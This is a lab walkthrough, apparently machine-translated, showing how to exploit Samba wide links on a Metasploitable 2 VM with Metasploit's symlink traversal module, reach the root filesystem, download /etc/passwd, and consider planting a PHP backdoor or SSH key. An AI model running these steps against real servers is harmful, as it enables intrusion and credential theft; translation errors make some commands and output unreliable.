Samba can be configured to allow anyone with write access to connect to the root file system. Once an attacker has this level of access, it is only a matter of time before the system gains possession. Although this configuration is not so common in nature, Metasploit can easily exploit this vulnerability.
Symbolic links or symlinks are files that point to other files or directories on a system. and they are an integral part of the Linux environment. Symlinks are often used to connect libraries and redirect specific binaries to other versions.
File-sharing systems such as Samba can use symbolic links to give users easy access to linked folders and files. However, these joins are usually limited to the share itself, which prevents access to the underlying file system.
Samba has the option to use wide links. These are basically symbolic links that may be linked outside the sandbox file share. This is obviously a major security issue as any user with write access to a share can connect to the root file system.
For this demonstration, we use Kali Linux to attack a virtual machine with Metasploitable 2. If you have a similar pentesting lab, you can read along.
: Create Link to Metasploit
After we have determined that the SMB service is running on the target, we must first check if we can access the shares and, if so, their Find names. We can use smbclient for this:
~ # smbclient -L //10.10.0.50/ Enter the WORKGROUP root password: Anonymous login successful Share name Type Comment --------- ---- ------- Print the $ disk printer driver tmp disk oh no! opt disc IPC $ IPC IPC Service (Samba 3.0.20 Debian Server) ADMIN $ IPC IPC Service (metasploitable server (Samba 3.0.20 Debian)) Reconnect to SMB1 to list the workgroups. Anonymous login successful server comment --------- ------- Workgroup Master --------- ------- WORKGROUP METASPLOITABLE
You can see above that we can log in anonymously and list the shares. It looks like there are some standard releases, but the one that looks interesting is called tmp . There is even a suspicious comment that we use as a target release.
Then start Metasploit by typing msfconsole in the terminal.
~ # msfconsole [-] *** The Metasploit Framework Console ... / [-] * WARNING: No database support: No database YAML file [-] , , , dBBBBBBb dBBBP dBBBBBP dBBBBb. O & # 39; dB & # 39; BBP dB & # 39; dB & # 39; dB & # 39; dBBP dBP dBP BB dB # dB # dBP dBP dBP BB dB # dB # dB # dBBBBP dBP dBBBBBB dBBBBBP dBBBBBb dBP dBBBP dBP dBBBBBP , , dB & # 39; dBP dB & # 39; .BP | dBP dBBBB & # 39; dBP dB & # 39; .BP dBP dBP - -o- dBP dBP dBP dB & # 39; .BP dBP dBP | dBBBBP dBP dBBBBP dBBBP dBP dBP , , o Brave to go where no Shell has gone before = [ metasploit v5.0.20-dev ] + - - = [ 1886 exploits - 1065 auxiliary - 328 post ] + - - = [ 546 payloads - 44 encoders - 10 nops ] + - - = [ 2 evasion ] msf5>
Recommended Reading: Metasploit Penetration Testing Cookbook, Third Edition
Once we are in the signup banner and it welcomes, we can search for a suitable module that uses for the search can] command:
msf5> search samba symlink Matching modules ================ # Name Disclosure Date Rank Check Description - ---- ---------------- ---- ----- ----------- 0 additional / admin / smb / samba_symlink_traversal normal No Samba Symlink Directory Traversal 1 additional / dos / samba / lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow 2 additional / dos / samba / lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow 3 additional / dos / samba / read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow 4 additional / scanner / rsync / modules_list normal Yes List of Rsync modules 5 additional / scanner / smb / smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized permission state 6 additional / server / wget_symlink_file_write 10/27/2014 normal No GNU Wget FTP Symlink Arbitrary Filesystem Access 7 Exploit / freebsd / samba / trans2open 2003-04-07 Excellent No Samba-Trans2open overflow (* BSD x86) 8 exploit / linux / local / abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt rights extension 9 exploit / linux / local / asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation 10 exploit / linux / samba / chain_reply Jun 16, 2010 Good No Samba chain_reply memory corruption (Linux x86) 11 exploit / linux / samba / is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename () Load any module 12 exploit / linux / samba / lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow 13 exploit / linux / samba / setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow 14 Exploit / Linux / Samba / Trans2open 2003-04-07 Excellent No Samba-Trans2open overflow (Linux x86) 15 exploit / multi / samba / nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow 16 exploit / multi / samba / usermap_script 2007-05-14 excellent No Samba command "username map script" 17 Exploit / osx / samba / lsa_transnames_heap 2007-05-14 Average No Samba lsa_io_trans_names Heap Overflow 18 Exploit / osx / samba / trans2open 07.04.2003 No Samba Trans2open overflow (Mac OS X PPC) 19 exploit / solaris / samba / lsa_transnames_heap 2007-05-14 average No samba lsa_io_trans_names heap overflow 20 Exploit / Solaris / Samba / Trans2open 07.04.2003 No Samba-Trans2open overflow (Solaris SPARC) 21 exploit / unix / http / quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection 22 exploit / unix / misc / distcc_exec 2002-02-01 excellent Yes Run the DistCC daemon command 23 exploit / unix / webapp / citrix_access_gateway_exec 12/21/2010 excellent Yes Citrix Access Gateway command execution 24 exploit / windows / fileformat / ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager code execution 25 exploit / windows / http / sambar6_search_results 21.06.2003 normal Yes Sambar 6 Search Results Buffer Overflow 26 Exploit / windows / license / calicclnt_getconfig 2005-03-02 Average No Computer Associates License Client GETCONFIG Overflow 27 exploit / windows / local / ms13_097_ie_registry_symlink Dec 10, 2013 great No MS13-097 Registry Symlink IE Sandbox Escape 28 exploit / windows / smb / group_policy_startup 2015-01-26 manual No execution of Group Policy scripts from shared resources 29 post / linux / gather / enum_configs normal No Linux Gather Configurations
We have received many results from this search term, but the one we want to use is actually the first one. Load the module with the command use followed by the path of the module:
msf5> use additional / admin / smb / samba_symlink_traversal
Now that we are loaded into the context of the module, use the command options can be used to display the settings:
msf5 additional (admin / smb / samba_symlink_traversal)> options Module Options (Help / admin / smb / samba_symlink_traversal): Name Current setting Required Description ---- --------------- -------- ----------- RHOSTS yes The destination address range or the CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBSHARE yes The name of a writable share on the server SMBTARGET rootfs yes The name of the directory to point to the root file system.
It looks like port 445 is already set as the correct port for SMB, as well as the name of the directory that is being created and which is linked to the root file system. We have to set the option RHOSTS as the IP address of the target:
msf5 auxiliary (admin / smb / samba_symlink_traversal)> set rhosts 10.10.0.50 rhosts => 10.10.0.50
And the name of the share that we want to write, in this case the share tmp :
msf5 additional (admin / smb / samba_symlink_traversal)> set smbshare tmp smbshare => tmp
Now we should all be set and just enter the following: run at the command prompt to start the module:
msf5 auxiliary (admin / smb / samba_symlink_traversal)> run [*] Current module against 10.10.0.50 [*] 10.10.0.50:445 - connection to server is established ... [*] 10.10.0.50:445 - Attempt to write writable release & # 39; tmp & # 39; to mount ... [*] 10.10.0.50:445 - Attempting to & # 39; rootfs & # 39; to associate with the root file system ... [*] 10.10.0.50:445 - Now access the following share to search the root file system: [*] 10.10.0.50:445 - \ 10.10.0.50 tmp rootfs [*] Supplement Module Completion
It specifies what it does during execution – it first connects to the server and provides the specified writable share. It then creates a link to the root file system and specifies where to access it. Perfect.
Once the module does its job, we can stop Metasploit with the command exit and use smbclient to connect to the target SMB share create:  msf5> exit
~ # smbclient //10.10.0.50/tmp
Enter the WORKGROUP root password:
Anonymous login successful
Try "Help" for a list of possible commands.
We can log in anonymously again and use the command ls to see the contents of the share:
smb: > ls , D 0 Wed Aug 8 10:52:28 2018 .. DR 0 Sun May 20 13:36:12 2012 4600.jsvc_up R 0 Wed Aug 8 08:57:48 2018 .ICE-unix DH 0 Wed Aug 8 08:56:05 2018 .X11-unix DH 0 Wed Aug 8 08:56:51 2018 .X0-lock HR 11 Wed Aug 8 08:56:51 2018 rootfs DR 0 Sun May 20 13:36:12 2012 7282168 blocks of size 1024. 5430648 blocks available
Apparently, there is a new directory created with the Metasploit module here. This is a link that we can enter like a normal directory. Let's do that and see what's inside:
smb: > cd rootfs smb: rootfs > ls , DR 0 Sun 20 May 13:36:12 2012 .. DR 0 Sun May 20 13:36:12 2012 initrd DR 0 Tue Mar 16 17:57:40 2010 Media DR 0 Tue Mar 16 17:55:52 2010 am DR 0 Sun May 13 22:35:33 2012 lost + found DR 0 Tue Mar 16 17:55:15 2010 Monday, April 28, 3:16:56 pm, DR 0, Wed., 2010 sbin DR 0 Sun 13 May 20:54:53 2012 initrd.img R 7929183 Sun May 13 22:35:56 2012 home DR 0 Fri Apr 16 01:16:02 2010 lib DR 0 Sun 13 May 22:35:22 2012 usr DR 0 Tue Apr 27 23:06:37 2010 proc DR 0 Wed Aug 8 08:55:30 2018 root DR 0 Wed Aug 8 08:56:51 2018 sys DR 0 Wed Aug 8 08:55:31 2018 boat DR 0 Sun 13 May 22:36:28 2012 nohup.out R 20962 Wed Aug 8 08:56:51 2018 etc DR 0 Wed Aug 8 08:56:23 2018 dev DR 0 Wed Aug 8 08:56:06 2018 vmlinuz R 1987288 Thu Apr 10 11:55:41 2008 opt DR 0 Tue Mar 16 17:57:39 2010 var DR 0 Wed Mar 17 09:08:23 2010 CD-ROM DR 0 Tue Mar 16 17:55:51 2010 tmp D 0 Wed Aug 8 10:52:28 2018 srv DR 0 Tue Mar 16 17:57:38 2010 7282168 blocks of size 1024. 5430648 blocks available
And there we have it – root file system access. We can now do things like view / etc / passwd though we can not do that directly. Just go to the directory / etc / and download the file to our computer with the command get :
smb: rootfs > cd etc get smb: rootfs etc > passwd Retrieving the file rootfs etc passwd with the size 1581 as passwd (128.7 kilobytes / sec.) (Average 128.7 kilobytes / sec.)
Now we can see all users available on the target, their home directories and Show the available shells. all useful information for the education:
~ # cat passwd root: x: 0: 0: root: / root: / bin / bash Daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh bin: x: 2: 2: bin: / bin: / bin / sh sys: x: 3: 3: sys: / dev: / bin / sh sync: x: 4: 65534: sync: / bin: / bin / sync Games: x: 5: 60: Games: / usr / Games: / bin / sh man: x: 6: 12: man: / var / cache / man: / bin / sh lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh mail: x: 8: 8: mail: / var / mail: / bin / sh news: x: 9: 9: news: / var / spool / news: / bin / sh uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh Proxy: x: 13: 13: Proxy: / bin: / bin / sh www-data: x: 33: 33: www-data: / var / www: / bin / sh backup: x: 34: 34: backup: / var / backups: / bin / sh list: x: 38: 38: mailing list manager: / var / list: / bin / sh irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh gnats: x: 41: 41: midges bug reporting system (admin): / var / lib / gnats: / bin / sh nobody: x: 65534: 65534: nobody: / nonexistent: / bin / sh libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh dhcp: x: 101: 102 :: / absent: / bin / false syslog: x: 102: 103 :: / home / syslog: / bin / false klog: x: 103: 104 :: / home / klog: / bin / false sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin msfadmin: x: 1000: 1000: msfdmin ,,,: / home / msfadmin: / bin / bash bind: x: 105: 113 :: / var / cache / bind: / bin / false postfix: x: 106: 115 :: / var / spool / postfix: / bin / false ftp: x: 107: 65534 :: / home / ftp: / bin / false postgres: x: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash mysql: x: 109: 118: mysql server ,,,: / var / lib / mysql: / bin / false tomcat55: x: 110: 65534 :: / usr / share / tomcat5.5: / bin / false distccd: x: 111: 65534 :: /: / bin / false user: x: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash service: x: 1002: 1002: ,,,: / home / service: / bin / bash telnetd: x: 112: 120 :: / not available: / bin / false proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false statd: x: 114: 65534 :: / var / lib / nfs: / bin / false
Other Attack Scenarios
Now that we have access to the root file system, an attacker can go several ways. It all depends on the attacker's imagination and the configuration of the target.
There is an important caveat here: Although we have root access to the file system, we have no root privileges. We only have the permissions associated with anonymous login to the tmp share (usually normal user rights). This limits the possible actions. However, depending on the configuration of the server, we can try a few things.
For example, because we have write access, we can place a PHP backdoor in the Apache Web root directory, and navigate in the browser to launch a shell for our local machine. Another attack vector, if the permissions on the SSH configuration file are insufficient, is to add it to the authorized key file so that we can include SSH in the box.
As a hacker, it's imperative to be creative, even in situations where it seems impossible to access the shell. With enough patience and creativity, this can be done.
Today we learned how to exploit broad links in Samba to access the root file system. After checking that we have access to an SMB share, we used a Metasploit module to create a link pointing to the root directory on the server. We were then able to see the root file system and examine some possible attack vectors. The ability to use a simple misconfiguration to exploit the system should be the goal of any white-hat hacker.